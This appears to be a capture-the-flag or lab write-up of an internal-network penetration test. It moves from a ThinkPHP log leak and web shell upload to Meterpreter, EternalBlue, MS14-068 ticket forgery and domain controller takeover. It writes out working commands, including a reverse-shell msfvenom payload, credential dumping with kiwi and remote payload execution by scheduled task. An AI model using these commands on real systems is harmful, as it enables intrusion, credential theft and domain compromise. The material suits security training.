Information Gathering Phase

1. Perform port scanning against the target IP address.

sudo nmap -sS --open -Pn -p- -v 192.168.0.3

2. Configure local hosts file to map 192.168.0.3 to www.webhack123.com and access the website, which reveals a ThinkPHP framework implementation.
3. Conduct directory enumeration on the website.
4. Identify and download wc.db database file. Using appropriate tools to examine this file reveals directory structure information, helping understand the website architecture.

Detection Phase

1. Since the website uses ThinkPHP framework, scan for common vulnerabilities using specialized tools. This reveals a log leakage vulnerability.
2. The logs contain leaked encrypted credentials:
   • Username: admin
   • Hash: 74c774ef39b5b977c1fd59dbfc73c3e380a65aa3
3. Decrypt the hash to obtain the plaintext password: web123.
4. Previous directory scanning didn't reveal the administrative backend, so use a script to perform host collision attacks for potential subdomains.
5. Identify admin.webhack123.com as the administrative backend.
6. Login using the obtained administrator credentials. Note that the CAPTCHA implementation has flaws, and password spraying with a comprehensive dictionary could also reveal the administrator password.
7. Access the website backend and modify permitted upload types to include a web shell.
8. Connect using AntSword to establish webshell access.
9. Perform initial host reconnaissance. Current user is administrator with no antivirus software detected. The host has dual network interfaces: 192.168.0.0/24 and 10.10.10.0/24, indicating a domain environment.

Generate a payload for initial connection through Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=9999 -f exe > payload.exe

9. Migrate process to obtain clear-text credentials.

migrate 600
load kiwi
creds_all

10. Gather information about users who have logged into the current host.

run post/windows/gather/enum_logged_on_users

11. Identify a domain user 'web' in the 'hackbox' domain. The local Administrator password is: !@#Qwe456
12. Identify the domain controller at dc.hackbox.com (10.10.10.149).

Domain Penetration Phase

1. Given the host has two network interfaces, scan for active hosts in both subnets. First, add routes:

run autoroute -s 10.10.10.0/24
run autoroute -p

2. Scan internal network segments, revealing only 10.10.10.149 (the domain controller) with port 445 open.
3. Test for EternalBlue vulnerability, which is confirmed to exist.
4. Reverse shell connection fails for unknown reasons, but a direct shell successfully returns a meterpreter session, granting domain controller access.
5. Attempt to exploit MS14-068 vulnerability. This requires a regular domain user account. While 'web' is a domain user, the password is unknown. Try using the web account with the previously obtained Administrator password (!@#Qwe456).
6. Login attempt fails, though the password appears correct. The issue may be related to remote group membership.

Create Kerberos ticket:

ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456
Load kiwi

Purge existing Kerberos tickets:

kerberos_ticket_purge

7. Upload mimikatz and inject the Kerberos ticket TGT_web@hackbox.com.ccache.
8. Verify the ticket using klist.
9. Sucessfully access the domain controller.
10. Generate a bind payload for domain controller access:

msfvenom -p windows/meterpreter/bind_tcp LPORT=9998 -f exe > dc_payload.exe

11. Copy the payload to the domain controller: copy dc_payload.exe \\dc\c$
12. Execute the payload using scheduled tasks:

net time \\dc
at \\dc 1:29:00 c:/dc_payload.exe

13. Successfully obtain domain controller privileges.
14. Migrate process to capture clear-text passwords.
15. Domain controller privileges have been fully compromised.
16. Migrate to domain administrator process to locate all three flag files.

Conclusion

This internal network target range exercise enhances understanding of internal network systems and develops proficiency in using Metasploit to complete the entire penetration testing process.